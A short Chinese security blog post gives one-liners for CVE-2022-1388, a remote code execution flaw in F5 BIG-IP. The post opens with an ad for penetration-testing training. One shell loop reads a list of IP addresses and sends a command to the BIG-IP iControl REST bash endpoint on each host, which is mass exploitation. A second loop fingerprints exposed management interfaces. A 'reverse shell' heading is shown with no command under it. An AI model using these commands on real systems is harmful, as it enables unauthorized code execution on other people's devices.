F5 BIG-IP(CVE-2022-1388) RCE
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
检测
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done
cat ips.txt | while read host do; do curl -sk "https://$host/mgmt/shared/authn/login" | grep -q 'resterrorresponse' && printf "$host 331;41mF5 iControl REST API Exposede[0mn"; done
反弹shell
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/4810.html